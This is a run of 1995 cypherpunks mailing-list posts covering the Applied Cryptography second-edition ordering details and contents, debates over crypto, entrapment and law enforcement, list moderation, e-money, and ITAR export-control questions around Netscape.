Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From perry at piermont.com Thu Nov 23 11:56:44 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 24 Nov 1995 03:56:44 +0800
Subject: How to order Applied Crypto direct from Bruce Schneier
Message-ID: <199511231937.OAA24938@jekyll.piermont.com>

Several people have asked for this. You might want to email him to ask if the offer is still open, since this was a while back.
From: Bruce Schneier Subject: Applied Cryptography, 2nd Edition: Ordering Information Date: Sun, 17 Sep 1995 18:09:34 -0500 (CDT) The SECOND EDITION of APPLIED CRYPTOGRAPHY is coming in November. This is a major rewrite: 50% more words, 7 more chapters, and over 1600 references. Not only did I make corrections to the first edition and add developments since it was published, but I also included topics left out of the first edition. (See table of contents--attached.) The second edition has lots of new algorithms (including GOST, Blowfish, RC4, and A5), more information on the Clipper Chip and key escrow, dozens of new protocols, more information on how PGP works, detailed information on key management and modes of operation, and new source code. The second edition will be published in paperback and hardcover. Right now I am making both available at a 15% discount. ***************************************************************** ORDER FORM Applied Cryptography, 2nd Edition (Hardcover): $70 * .85 = $59.00 Applied Cryptography, 2nd Edition (Softcover): $50 * .85 = $42.00 Shipping: Air (U.S.): $5 per book Surface (U.S.): $3 per book Canada/Mexico: $7 per book Everywhere else: $9 per book Send to: Counterpane Systems, 101 E Minnehaha Parkway, Minneapolis, MN 55419 I need payment by check, in U.S. funds drawn on a U.S. bank. Or a postal money order. Sorry, no credit cards. 
***************************************************************** APPLIED CRYPTOGRAPHY, SECOND EDITION Table of Contents ((Sections in all capitals are either new or substantially rewritten.)) Foreword by Whitfield Diffie Preface Chapter 1: Foundations Terminology; STEGANOGRAPHY; Substitution Ciphers and Transposition Ciphers; Simple XOR; One-Time Pads; Computer Algorithms; Large Numbers Part I: Cryptographic Protocols Chapter 2: Protocol Building Blocks Introduction to Protocols; Communications using Symmetric Cryptography; One-Way Functions; One-Way Hash Functions; Communications using Public-Key Cryptography; Digital Signatures; Digital Signatures with Encryption; Random and Pseudo-Random Sequence Generation Chapter 3: Basic Protocols Key Exchange; Authentication; AUTHENTICATION AND KEY EXCHANGE; FORMAL ANALYSIS OF AUTHENTICATION AND KEY-EXCHANGE PROTOCOLS; Multiple-Key Public-Key Cryptography; Secret Splitting; Secret Sharing; Cryptographic Protection of Databases Chapter 4: Intermediate Protocols Timestamping Services; Subliminal Channel; Undeniable Digital Signatures; DESIGNATED CONFIRMER SIGNATURES; PROXY SIGNATURES; Group Signatures; Fail-Stop Digital Signatures; Computing with Encrypted Data; Bit Commitment; Fair Coin Flips; Mental Poker; ONE-WAY ACCUMULATORS; All-or-Nothing Disclosure of Secrets; KEY ESCROW Chapter 5: Advanced Protocols ZERO-KNOWLEDGE PROOFS; Zero-Knowledge Proofs of Identity; Blind Signatures; IDENTITY-BASED PUBLIC-KEY CRYPTOGRAPHY; Oblivious Transfer; OBLIVIOUS SIGNATURES; Simultaneous Contract Signing; Digital Certified Mail; Simultaneous Exchange of Secrets Chapter 6: Esoteric Protocols SECURE ELECTIONS; Secure Multiparty Computation; Anonymous Message Broadcast; DIGITAL CASH Part II: Cryptographic Techniques Chapter 7: Key Length SYMMETRIC KEY LENGTH; PUBLIC-KEY KEY LENGTH; COMPARING SYMMETRIC AND PUBLIC-KEY KEY LENGTH; BIRTHDAY ATTACKS AGAINST ONE-WAY HASH FUNCTIONS; How Long Should a Key Be?; Caveat Emptor Chapter 8: Key Management
Generating Keys; NONLINEAR KEYSPACES; Transferring Keys; Verifying Keys; Using Keys; UPDATING KEYS; Storing Keys; Backup Keys; Compromised Keys; Lifetime of Keys; Destroying Keys; Public-Key Key Management Chapter 9: Algorithm Types and Modes Electronic Codebook Mode; Block Replay; Cipher Block Chaining Mode; Stream Ciphers; Self-Synchronizing Stream Ciphers; Cipher-Feedback Mode; Synchronous Stream Ciphers; Output-Feedback Mode; Counter Mode; Other Block-Cipher Modes; CHOOSING A CIPHER MODE; INTERLEAVING; Block Ciphers vs. Stream Ciphers Chapter 10: Using Algorithms Choosing an Algorithm; Public-Key Cryptography vs. Symmetric Cryptography; Encrypting Communications Channels; ENCRYPTING DATA FOR STORAGE; Hardware Encryption vs. Software Encryption; COMPRESSION, ENCODING, AND ENCRYPTION; DETECTING ENCRYPTION; HIDING CIPHERTEXT IN CIPHERTEXT; DESTROYING INFORMATION Part III: Cryptographic Algorithms Chapter 11: Mathematical Background Information Theory; Complexity Theory; NUMBER THEORY; FACTORING; Prime Number Generation; Discrete Logarithms in a Finite Field Chapter 12: Data Encryption Standard Background; Description of DES; Security of DES; DIFFERENTIAL AND LINEAR CRYPTANALYSIS; THE REAL DESIGN CRITERIA; DES VARIANTS; HOW SECURE IS DES TODAY? 
Chapter 13: Other Block Algorithms Lucifer; Madryga; Newdes; Feal-N; Redoc; LOKI; Khufu and Khafre; RC2; Idea; Mmb; CA-1.1; SKIPJACK Chapter 14: Still Other Block Algorithms GOST; CAST; BLOWFISH; SAFER K-64; 3-WAY; CRAB; SXAL8/MBAL; RC5; OTHER BLOCK ALGORITHMS; THEORY OF BLOCK CIPHER DESIGN; USING ONE-WAY HASH FUNCTIONS; CHOOSING A BLOCK ALGORITHM Chapter 15: Combining Block Algorithms DOUBLE ENCRYPTION; TRIPLE ENCRYPTION; DOUBLING THE BLOCK LENGTH; OTHER MULTIPLE ENCRYPTION SCHEMES; CDMF KEY SHORTENING; WHITENING; CASCADING MULTIPLE BLOCK ALGORITHMS; COMBINING MULTIPLE BLOCK ALGORITHMS Chapter 16: Pseudo-Random-Sequence Generators and Stream Ciphers Linear Congruential Generators; Linear Feedback Shift Registers; LFSRs in Software; DESIGN AND ANALYSIS OF STREAM CIPHERS; Stream Ciphers using LFSRs; A5; HUGHES XPD/KPD; NANOTEQ; RAMBUTAN; ADDITIVE GENERATORS; GIFFORD; ALGORITHM M; PKZIP Chapter 17: Other Stream Ciphers and Real Random-Sequence Generators RC4; SEAL; WAKE; FEEDBACK WITH CARRY SHIFT REGISTERS; STREAM CIPHERS USING FCSRS; NONLINEAR FEEDBACK SHIFT REGISTERS; Other Stream Ciphers; System-Theoretic Approach to Stream Cipher Design; Complexity-Theoretic Approach to Stream Cipher Design; Other Approaches to Stream Cipher Design; CASCADING MULTIPLE STREAM CIPHERS; CHOOSING A STREAM CIPHER; GENERATING MULTIPLE STREAMS FROM A SINGLE PSEUDO-RANDOM SEQUENCE GENERATOR; REAL RANDOM-SEQUENCE GENERATORS Chapter 18: One-Way Hash Functions Background; Snefru; N-HASH; MD4; MD5; MD2; Secure Hash Algorithm (SHA); RIPE-MD; Haval; Other One-Way Hash Functions; ONE-WAY HASH FUNCTIONS USING SYMMETRIC BLOCK ALGORITHMS; Using Public-key Algorithms; CHOOSING A ONE-WAY HASH FUNCTION; MESSAGE AUTHENTICATION CODES Chapter 19: Public-Key Algorithms Background; Knapsack Algorithms; RSA; Pohlig-Hellman; Rabin; ElGamal; McEliece; Elliptic Curve Cryptosystems; LUC; FINITE AUTOMATON PUBLIC-KEY CRYPTOSYSTEMS Chapter 20: Public-Key Digital Signature Algorithms Digital Signature Algorithm
(DSA); DSA VARIANTS; GOST DIGITAL SIGNATURE ALGORITHM; DISCRETE LOGARITHM SIGNATURE SCHEMES; Ong-Schnorr-Shamir; Esign; Cellular Automata; Other Public-Key Algorithms Chapter 21: Identification Schemes Feige-Fiat-Shamir; Guillou-Quisquater; Schnorr; CONVERTING IDENTIFICATION SCHEMES TO SIGNATURE SCHEMES Chapter 22: Key-Exchange Algorithms DIFFIE-HELLMAN; STATION-TO-STATION PROTOCOL; Shamir's Three-Pass Protocol; COMSET; Encrypted Key Exchange; FORTIFIED KEY NEGOTIATION; Conference Key Distribution and Secret Broadcasting Chapter 23: Special Algorithms for Protocols Multiple-Key Public-Key Cryptography; Secret Sharing Algorithms; Subliminal Channel; Undeniable Digital Signatures; DESIGNATED CONFIRMER SIGNATURES; Computing with Encrypted Data; Fair Coin Flips; ONE-WAY ACCUMULATORS; All-or-Nothing Disclosure of Secrets; FAIR AND FAILSAFE CRYPTOSYSTEMS; Zero-Knowledge Proofs of Knowledge; Blind Signatures; Oblivious Transfer; Secure Multiparty Computation; Probabilistic Encryption; Quantum Cryptography Part IV: The Real World Chapter 24: Example Implementations IBM Secret-Key Management Protocol; Mitrenet; ISDN; STU-III; Kerberos; KryptoKnight; SESAME; IBM COMMON CRYPTOGRAPHIC ARCHITECTURE; ISO Authentication Framework; Privacy-Enhanced Mail (PEM); Message Security Protocol; PRETTY GOOD PRIVACY (PGP); SMART CARDS; PUBLIC-KEY CRYPTOGRAPHY STANDARDS; UNIVERSAL ELECTRONIC PAYMENT SYSTEM; CLIPPER; CAPSTONE; AT&T MODEL 3600 TELEPHONE SECURITY DEVICE Chapter 25: Politics NATIONAL SECURITY AGENCY; National Computer Security Center; National Institute of Standards and Technology; RSA Data Security, Inc.; PUBLIC KEY PARTNERS; International Association for Cryptologic Research; RACE Integrity Primitives Evaluation; CONDITIONAL ACCESS FOR EUROPE; ISO/IEC 9979; PROFESSIONAL, CIVIL LIBERTIES, AND INDUSTRY GROUPS; Sci.Crypt; CYPHERPUNKS; Patents; U.S.
EXPORT RULES; FOREIGN IMPORT AND EXPORT OF CRYPTOGRAPHY; Legal Issues AFTERWORD BY MATT BLAZE Source Code DES; LOKI91; IDEA; GOST; BLOWFISH; 3-WAY; RC5; A5; SEAL; WAKE References From cme at clark.net Thu Nov 23 12:04:10 1995 From: cme at clark.net (Carl Ellison) Date: Fri, 24 Nov 1995 04:04:10 +0800 Subject: crypto for porno users Message-ID: <199511231945.OAA03659@clark.net> Hi Jay. >Date: Thu, 23 Nov 1995 00:17:47 -0800 >From: Jay Campbell >Subject: Re: crypto for porno users >A law >enforcement team would be stepping onto shaky ground if they were forced to >transfer illegal images/etc to a suspected trafficker before getting evidence >from him. Entrapment is an ugly concept. We've been hearing about such things (using the mails) for some time. I don't know how the cops avoided entrapment when they posed as kiddie porn customers or pedophiles when they were doing the AOL sting. >>3. Encryption of porn would work against the kind of porn distribution >> found on the alt.binary.pictures.erotic... newsgroups. Encryption >> requires that recipients be identified. > >Not at all .. a porn distributor could generate a key pair, use part A to >encode the images, and disseminate part B thru a variety of outlets - >publicly posted, sold, passed thru an informal network of like-minded >netizens... It's that informal network which is the danger to the pornographer. The bigger the network, the closer to certainty that it's been infiltrated. Strong authentication via crypto does not create a trusted group. Trust is a human:human decision -- subject to severe flaws, none of which are solved by crypto. [Can you devise a crypto protocol which will prevent or even just detect adultery, for example?] With each additional person, there is a probability of deception. For this informal network of yours, deception by any one participant constitutes a security failure. If you want to avoid that, therefore, you need to keep the group *very small*.
If it's that small, then it's not that interesting a target for LE. >I would argue the exact opposite - strong crypto would tend to minimize the >effective take, since there's no guarantee that /anything/ on a perp's >system will be in the clear. I'll let someone else with a better background >pound on the 'brute force' section. Ah -- but that's the point I was making. Crypto gives the appearance of security -- whether it's in the informal network or with file storage. It's often a bank vault door on a cardboard house. For much of what people do, especially if there's a large net, it's not rational to expect to achieve security. But -- if people have done something to achieve security, they're likely to be fooled into trusting it to be adequate. Meanwhile, if *everything* on the perp's machine is encrypted, you're probably in good shape. That means he'll be required to type passwords too often -- so he'll either pick a small one or have some machinery which stores the password. Both give cryptanalytic advantages. This isn't a guarantee that *every* perp will be wide open. Some won't be. It means that a bunch of perps will be wide open (out of their own carelessness -- like the breaks into the Enigma net). The question you need to look at is not the control-freak question which Freeh seems concerned with: A) the probability that some one perp will manage to hide his data but rather the SIGINT question: B) the expected percentage of perps who will fail to hide their data Have a good day. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! 
He's whistling a dirty song.'' | +---------------------------------------------- Jean Ellison (aka Mother) -+ From attila at primenet.com Thu Nov 23 12:10:30 1995 From: attila at primenet.com (attila) Date: Fri, 24 Nov 1995 04:10:30 +0800 Subject: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test) In-Reply-To: <9511231639.AA25523@mhv.net> Message-ID: On Thu, 23 Nov 1995, Lynne L. Harrison wrote: > > >I am inclined to agree with Perry in as much as the volume of posts to > >the cypherpunks list is greatly increased by reposts of news from > >other mailing lists, USENET newsgroups, WWW sources, newspapers, TV > >programs, films, books, talks, etc. While some of the information > >posted is interesting, and relevant, some others are less relevant, > >bordering on noise. > > > >The proposal: a separate list for current-event reports/news/reposts. > someone suggested a new list --moderated. My concern, so circulated, is that whoever (including backups to cover vacations and travel) accepts the responsibility must not thrash any of the code posts. My suggestion for making the list effective is to always post to c|punks, even if you are on the code list which means "cypherpunks" is still the same; who ever is doing the moderating then forwards all the code threads to "cypherpunks.moderated" --you get the best of both worlds. > 1. Creating a separate list, IMHO, will not stop cross-posts to the list. > People will merely add one more list to their "cc" line. > no doubt. for instance, whoever put c|punks on the ACLUNATL at aol.com biweekly list would just hit both and that one cannot be unsubscribed except by the original subscriber. however, that one is concise -let's hope we do not get hit with "digitaliberty," "VTW" or any of the rest of the prolific slammers/day. the issue as pointed out above is a separate moderated and non-postable list. > 2. More importantly, I am troubled with the "this is OUR list" attitude > that some people have expressed. 
Yes, it is a pain when there are > cross-posts that are completely off-topic but, as Adam correctly points out, > some are interesting and relevant. > but is not the charter of the list "cypherpunks write code" an issue. I don't go as far as Perry on irrelevancy (and Perry breaks his own commandment at will --as do I). > One of the tenets proposed by those on this list is free speech. Most > of us are on more than one list, so I'm assuming that most of us receive > 100+ messages a day. It is irritating to read something that's been crossed > to c|punks that has nothing to do with this list. However, it only takes a > few seconds to arrive at that conclusion and trash the post. that may be true, but it is annoying enough that I use 'procmail' to waste the lists (and Dr. Fred) before they even make the message list. AND, 'procmail' separates all the mailing list into separate folders on the way in --I have not read a newsgroup for almost a year unless I am looking for something very specific. > The "they are targeting this list" borders almost on paranoia. While > some paranoia is healthy :) - it should not lead to the cry to ban posts > that have been *deemed* to be inappropriate. > any one with a political agenda is going to cross post any list which, in their opinion, might be an audience. the ACLU post today is obvious --freedom of speech and congressional action to effectively shut down the internet, which certainly falls within our mainstream "interests." > I find it interesting that those who express that the net should be a > community where expression is to be encouraged and defended - until the time > arrives when such "unsolicited/unwanted/offensive/irrelevant" expression > knocks on one's front door. > this is a valid concern. the last figure I saw for lists was 12,000+. if some of them do not overlap, where did they find 12,000 topics worthy of a mail list?
as I said, procmail takes care of the yeoman's portion, but it is not the be all to end all either. I'm not at the point of writing an ai based preprocessor which analyzes the content of the folders before invoking my mail reader, but how far off is that? information may be key to survival, but... > Regards - > Lynne > comment to Lynne: that is the key to life as we know it! > > ******************************************************* > Lynne L. Harrison, Esq. | "The key to life: > Poughkeepsie, New York | - Get up; > E-mail: | - Survive; > lharrison at mhv.net | - Go to bed." > ******************************************************* > From gnu at toad.com Thu Nov 23 12:41:21 1995 From: gnu at toad.com (John Gilmore) Date: Fri, 24 Nov 1995 04:41:21 +0800 Subject: Bitbux could eliminate some domestic currencies? Message-ID: <9511232021.AA20165@toad.com> Date: Mon, 13 Nov 1995 17:35:39 -0500 From: Dave Farber Subject: IP: cybercash! Holy Mackeral, Andy! To: interesting-people at eff.org (interesting-people mailing list) From a letter in [My dog, I mean my software, ate this part of the msg -- gnu] "Sir, Prof Alec Chrystal ... argues that because cash is unimportant, its replacement by smart cards will have little impact. However, cash is virtually the only kind of money issued by government (in the UK, more than 99 per cent). If a government cannot issue cash because e-money facilitates the use of another country's currency for domestic transactions, it will lose virtually all its seignorage. The government will have to issue some £23 billion extra gilts and then pay about £2 billion every year in extra interest. "Moreover, cash circulates much more quickly than bank deposits (it has a high velocity-adjusted weight). Cash was used for almost 15 billion retail transactions in the UK in 1993, versus 4 billion for all other methods. So the currency in which retail transactions is priced is in practice determined by the denomination of cash.
E-money would threaten this dominance, allowing people to stop using domestic currency completely (other than for paying taxes). "The importance of e-money replacing cash is greater than possible effects on exchange rates. Rather, it might make certain currencies to all intents and purposes disappear." Giles Keating head of global economics CS First Boston London, UK From froomkin at law.miami.edu Thu Nov 23 12:50:40 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Fri, 24 Nov 1995 04:50:40 +0800 Subject: Spam the Sign! In-Reply-To: <199511230002.QAA01527@goblin.punk.net> Message-ID: Actually, the application of the law tends to be far more reasonable than non-lawyers believe. This is one of the hardest things to get law students to believe. But it is a human process, not a mechanical one. If you sell a product legally in the US, taking reasonable precautions to observe the ITAR and making clear to your customers what their obligations are, you have essentially zero risk. How do I know this? Many, many, many people do exactly that every day, and none have AFAIK even been threatened with prosecution. This is NOT IMHO how the ITAR restricts intra-US trade. The ITAR restrict intra-US trade by inducing people to make only exportable products so that they don't have the trouble of supporting two different versions, doing 2 kinds of paperwork, etc. OTOH, if you hand software to someone to put on an FTP site, nudge, nudge, wink, wink let's hope it doesn't get exported, ha, ha, then you really are guilty of trying to end-run the ITAR, and the feds may give you a hard time, which after all is their job if you are breaking federal law. None of this of course goes to the question of whether the ITAR is good/bad or un/constitutional. A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O.
Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. From mark at unicorn.com Thu Nov 23 12:52:39 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Fri, 24 Nov 1995 04:52:39 +0800 Subject: How to order Applied Crypto direct from Bruce Schneier Message-ID: On Thu, 23 Nov 1995, Perry E. Metzger wrote: > Source Code > DES; LOKI91; IDEA; GOST; BLOWFISH; 3-WAY; RC5; A5; SEAL; ^^ Is that the real A5, or the version that was posted to Usenet some time ago ? Mark From froomkin at law.miami.edu Thu Nov 23 12:57:14 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Fri, 24 Nov 1995 04:57:14 +0800 Subject: Disclaimers [WAS Re: Java & Netscape security [NOISE]] In-Reply-To: Message-ID: I don't want to ruin a nice thanksgiving by starting a flame war. So let me just say that whether a post from a Tron.com address by a person saying "I don't speak for tron corporation" would be held to be a valid disclaimer is complicated, fact-driven, and (unless there is a state statute that speaks to the question) a question of what it was reasonable for an average reasonable recipient to think under the circumstances. Anyone who says "precedent says X" on this subject is oversimplifying. For one thing there are 50 states. They may not all have the same answer for given facts.... A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here.
From khijol!erc at uunet.uu.net Thu Nov 23 14:12:43 1995 From: khijol!erc at uunet.uu.net (Ed Carp [khijol SysAdmin]) Date: Fri, 24 Nov 1995 06:12:43 +0800 Subject: crypto for porno users In-Reply-To: <199511231945.OAA03659@clark.net> Message-ID: <199511232149.PAA21305@khijol> -----BEGIN PGP SIGNED MESSAGE----- > >A law > >enforcement team would be stepping onto shaky ground if they were forced to > >transfer illegal images/etc to a suspected trafficer before getting evidence > >from him. Entrapment is an ugly concept. > > We've been hearing about such things (using the mails) for some time. I > don't know how the cops avoided entrapment when they posed as kiddie porn > customers or pedophiles when they were doing the AOL sting. As I recall, the courts have sent the message to the LE community that it's entrapment if they entice someone into doing something that they normally wouldn't do. If you're a kiddie porn dealer, and I as a LE officer entice you to sell me some pictures of that cute 8-year-old doing some geezer, then that's not entrapment. If I, on the other hand, try to pressure you (assuming you are a law-abiding citizen) into buying such by either misrepresenting the article in question or by threatening you with dire consequences if you don't buy, etc. - in other words, forcing or enticing you to do something you normally wouldn't do - *that's* entrapment. - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. 
From khijol!erc at cygnus.com Thu Nov 23 14:13:43 1995 From: khijol!erc at cygnus.com (Ed Carp [khijol SysAdmin]) Date: Fri, 24 Nov 1995 06:13:43 +0800 Subject: crypto for porno users In-Reply-To: <199511231945.OAA03659@clark.net> Message-ID: <199511232157.PAA21597@khijol> -----BEGIN PGP SIGNED MESSAGE----- > Strong authentication via crypto does not create a trusted group. Trust is > a human:human decision -- subject to severe flaws, none of which are solved > by crypto. [Can you devise a crypto protocol which will prevent or even > just detect adultery, for example?] With each additional person, there is > a probability of deception. For this informal network of yours, deception > by any one participant constitutes a security failure. If you want to > avoid that, therefore, you need to keep the group *very small*. If it's > that small, then it's not that interesting a target for LE. Very true. Authentication, whether strong or weak, merely says that you are who you say you are - totally different from this "web of trust" I keep hearing about - and that is *it*. Do you trust me any more now than before I started signing my postings? > Ah -- but that's the point I was making. Crypto gives the appearance of > security -- whether it's in the informal network or with file storage. > It's often a bank vault door on a cardboard house. For much of what people > do, especially if there's a large net, it's not rational to expect to > achieve security. But -- if people have done something to achieve > security, they're likely to be fooled into trusting it to be adequate. > > Meanwhile, if *everything* on the perp's machine is encrypted, you're > probably in good shape.
That means he'll be required to type passwords too > often -- so he'll either pick a small one or have some machinery which > stores the password. Both give cryptanalytic advantages. It's well-known that most revelations of encrypted information come from "humint", not from mathematical finesse with the encryption scheme. I especially love Oracle's idea of security - when submitting SQL to the Oracle back-end, to automate the process, you feed it your user ID and password IN THE CLEAR, ON THE COMMAND LINE. Any weenie can run "ps -ef/ps -ax" and pipe it to grep. The fact that Larry Ellison won't do anything about it seems to me to be idiocy of the first order, and that Oracle doesn't know what it's doing. It's not even a good database product. Deity only knows why people keep buying it, although that's rather off-topic ;) - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From dl at hplyot.obspm.fr Thu Nov 23 14:34:21 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Fri, 24 Nov 1995 06:34:21 +0800 Subject: Spam the Sign! In-Reply-To: <199511202259.OAA11521@netscape.com> Message-ID: <9511232218.AA19027@hplyot.obspm.fr> Corey Bridges writes: > And yes, we HAVE enjoyed the message "Strong Crypto NOW" that's been > scrolling for the last 3 hours. Where the spam was coming from ? Btw, the web,... application is *great* it is always nice to (appear) to interact with the real world !
('cept that when I tried, the only thing the camera showed was indeed "Strong Crypto" or "Now", it wouldn't let pass one of my messages) It is a very easy target for abuses though... Very nice job, keep up ! dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept bomb domestic disruption Soviet Kennedy Peking Uzi plutonium From dl at hplyot.obspm.fr Thu Nov 23 14:52:24 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Fri, 24 Nov 1995 06:52:24 +0800 Subject: Export control FTP servers In-Reply-To: Message-ID: <9511232220.AA19031@hplyot.obspm.fr> sameer at c2.org writes: [ 'passwd'/'secret' is NEWDIRNAME : ] > NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum` [...] Hey hey, cool, what a great security ! now can you please send source for /usr/local/bin/pseudo-random ? :-))) dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept PGP Clinton ammunition Greenpeace Croatian Kennedy genetic From jsimmons at goblin.punk.net Thu Nov 23 15:46:10 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Fri, 24 Nov 1995 07:46:10 +0800 Subject: Spam the Sign! In-Reply-To: Message-ID: <199511232322.PAA00782@goblin.punk.net> > > Actually, the application of the law tends to be far more reasonable than > non-lawyers believe. This is one of the hardest things to get law > students to believe. But it is a human process, not a mechanical one. > > If you sell a product legally in the US, taking reasonable precautions to > observe the ITAR and making clear to your customers what their obligations > are, you have essentially zero risk. How do I know this? Many, many, > many people do exactly that every day, and none have AFAIK even been > threatened with prosecution. This is NOT IMHO how the ITAR restricts > intra-US trade.
The ITAR restrict intra-US trade by inducing people to > make only exportable products so that they don't have the trouble of > supporting two different versions, doing 2 kinds of paperwork, etc. > > OTOH, if you hand software to someone to put on an FTP site, nudge, > nudge, wink, wink let's hope it doesn't get exported, ha, ha, then you > really are guilty of trying to end-run the ITAR, and they feds may give > you a hard time, which after all is their job if you are breaking federal > law. > Then suppose you hand software to MIT to put on its export-controlled ftp site (which would seem to follow your requirements to take reasonable precautions to observe the ITAR, etc.) and you don't do the nudge, nudge, wink, wink - BUT you know that it's going to be available on major ftp sites in Europe within a few hours anyway. The intent to export isn't there, but the export occurs anyway. Is it the intent, or the knowledge that's important? Obviously the intent, or the MIT server would be in jail. So I demonstrate lack of intent to export, by following MIT's model when I set up my own 'export controlled' ftp server. Am I safe? Or do I need a note from the NSA or somebody to do this? And if I do need somebody or something's 'permission', and they refuse to give it, aren't they using ITAR to restrict the distribution domestically? Do I have any options in this case other than to give up? Or, to bring it down to a practical question, what's stopping Netscape? How does Netscape setting up an 'export controlled' ftp site based on the MIT version lead to one of their executives going to jail? I have the feeling that we're talking about two different things here - the law as it's practiced in the courtroom and the law as it's practiced on the 'streets'. Obviously, the fact that I feel I'm doing something 'legal' won't help much if the government decides to do a Phil Zimmerman on me. But I would be interested in your comments. 
-- Jeff Simmons jsimmons at goblin.punk.net From rsalz at osf.org Thu Nov 23 16:20:44 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 24 Nov 1995 08:20:44 +0800 Subject: Spam the Sign! Message-ID: <9511240003.AA05004@sulphur.osf.org> > Or do I need >a note from the NSA or somebody to do this? Somebody at DoD, department of trade control. I posted the address and phone number of the guy here a couple of days ago -- check the archives. Cool soon, he's leaving early December; expect him to be replaced by someone clueless. /r$ From EALLENSMITH at ocelot.Rutgers.EDU Thu Nov 23 17:13:57 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Fri, 24 Nov 1995 09:13:57 +0800 Subject: e$: Come aaaannnndddd Get it! Message-ID: <01HXZTB0E3XG8WYILG@mbcl.rutgers.edu> From: IN%"sameer at c2.org" "sameer" 16-NOV-1995 19:01:20.75 >From EALLENSMITH: > I will as soon as someone comes up with a _fully_ private digital > cash system and starts using it for something. As I understand it, Chaum's > ecash system is not one (i.e., non-privacy to the sender and of amounts to the > bank). If I'm incorrect, please tell me and I'll set up an account with MTB > immediately (if there's a text-based interface). ecash provides full payor anonymity. Payee anonymity is currently not possible, but that is being worked on. ---------------- That's what I said; "non-privacy to the sender" is lack of payee anonymity. This lack is problematic for me personally in two respects: First, there is that, as I have stated, I would like to be a payee at some point. My likelihood of doing so is decreased if I do not have an anonymity option. Second, services that I might like to utilize are less likely to be available if the anonymity of the provider is not guaranteed. -Allen From jimbell at pacifier.com Thu Nov 23 18:35:43 1995 From: jimbell at pacifier.com (jim bell) Date: Fri, 24 Nov 1995 10:35:43 +0800 Subject: Spam the Sign! Message-ID: Jeff Simmons said...
>Then suppose you hand software to MIT to put on its export-controlled ftp
>site (which would seem to follow your requirements to take reasonable
>precautions to observe the ITAR, etc.) and you don't do the nudge, nudge,
>wink, wink - BUT you know that it's going to be available on major ftp
>sites in Europe within a few hours anyway. The intent to export isn't
>there, but the export occurs anyway. Is it the intent, or the knowledge
>that's important?
>
>Obviously the intent, or the MIT server would be in jail.
>
>So I demonstrate lack of intent to export, by following MIT's model when I
>set up my own 'export controlled' ftp server. Am I safe? Or do I need
>a note from the NSA or somebody to do this? And if I do need somebody or
>something's 'permission', and they refuse to give it, aren't they using
>ITAR to restrict the distribution domestically? Do I have any options in
>this case other than to give up?
>
>Or, to bring it down to a practical question, what's stopping Netscape? How
>does Netscape setting up an 'export controlled' ftp site based on the MIT
>version lead to one of their executives going to jail?
>
>I have the feeling that we're talking about two different things here - the
>law as it's practiced in the courtroom and the law as it's practiced on the
>'streets'. Obviously, the fact that I feel I'm doing something 'legal'
>won't help much if the government decides to do a Phil Zimmerman on me.
>But I would be interested in your comments.

I very much agree with the direction you appear to be headed in. It seems
to me that Netscape should have no problem devising some sort of scenario in
which such a program eventually gets onto the nets, but in a way that is
squeaky clean, at least for THEM.

In addition, why should they even need to write the encryption part of their
software IN the US?
It occurs to me that one way to do this might be to
send one of their programmers to a conveniently-located place, such as
Vancouver BC, Montreal Canada, or a few other nearby places, with a great
deal of fanfare, and tell him to "write some crypto." He does, and brings
it back into the US with him, leaving a copy of it "outside" the country for
international distribution.

From fc at all.net Thu Nov 23 19:00:41 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Fri, 24 Nov 1995 11:00:41 +0800
Subject: Spam the Sign!
In-Reply-To:
Message-ID: <9511240239.AA15636@all.net>

> Jeff Simmons said...
>
> >Then suppose you hand software to MIT to put on its export-controlled ftp
> >site (which would seem to follow your requirements to take reasonable
> >precautions to observe the ITAR, etc.) and you don't do the nudge, nudge,
> >wink, wink - BUT you know that it's going to be available on major ftp
> >sites in Europe within a few hours anyway. The intent to export isn't
> >there, but the export occurs anyway. Is it the intent, or the knowledge
> >that's important?

What's important to the government is that the crypto not be exported.
If Netscape did this, the government might try to take them to court to
make an example of them, or might leave them alone to support the
information superhighway, or might refuse to ever buy any Netscape, or
whatever. The point for Netscape is that none of these are good for the
corporation.

> >Or, to bring it down to a practical question, what's stopping Netscape? How
> >does Netscape setting up an 'export controlled' ftp site based on the MIT
> >version lead to one of their executives going to jail?

Maybe their executives don't want to deal with the possibility of going to
jail and are staying far from the edge of the law. Maybe they are too busy
